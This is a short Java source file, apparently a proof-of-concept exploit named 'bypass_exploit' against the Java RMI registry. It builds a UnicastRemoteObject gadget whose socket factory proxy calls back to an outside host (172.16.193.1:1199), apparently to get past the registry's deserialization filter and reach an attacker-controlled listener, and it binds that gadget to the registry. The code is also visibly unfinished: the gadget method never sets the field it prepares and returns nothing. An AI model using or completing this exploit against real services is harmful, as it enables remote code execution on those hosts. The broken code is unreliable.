package test;

import sun.rmi.registry.RegistryImpl_Stub;

import sun.rmi.server.UnicastRef;

import sun.rmi.transport.LiveRef;

import sun.rmi.transport.tcp.TCPEndpoint;

import java.lang.reflect.Constructor;

import java.lang.reflect.Field;

import java.lang.reflect.Proxy;

import java.rmi.Remote;

import java.rmi.registry.LocateRegistry;

import java.rmi.server.ObjID;

import java.rmi.server.RMIServerSocketFactory;

import java.rmi.server.RemoteObjectInvocationHandler;

import java.rmi.server.UnicastRemoteObject;

import java.util.Random;

public class bypass_exploit {

public static void main(String[] args) throws Exception {

RegistryImpl_Stub registryImpl_stub = new RegistryImpl_Stub();

registryImpl_stub.bind(LocateRegistry.getRegistry(),"hello", getGadget("172.16.193.1",1199));

}

public static UnicastRemoteObject getGadget(String host, int port) throws Exception {

Constructor<?> constructor = UnicastRemoteObject.class.getDeclaredConstructor(null);

constructor.setAccessible(true);

UnicastRemoteObject clz = (UnicastRemoteObject) constructor.newInstance(null);

Field ssf = UnicastRemoteObject.class.getDeclaredField("ssf");

ssf.setAccessible(true);

ObjID id = new ObjID(new Random().nextInt());

TCPEndpoint te = new TCPEndpoint(host, port);

UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));

RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(ref);

RMIServerSocketFactory rmiServerSocketFactory = (RMIServerSocketFactory) Proxy.newProxyInstance(RMIServerSocketFactory.class.getClassLoader(), new Class[] {

RMIServerSocketFactory.class, Remote.class

}, remoteObjectInvocationHandler);

}

}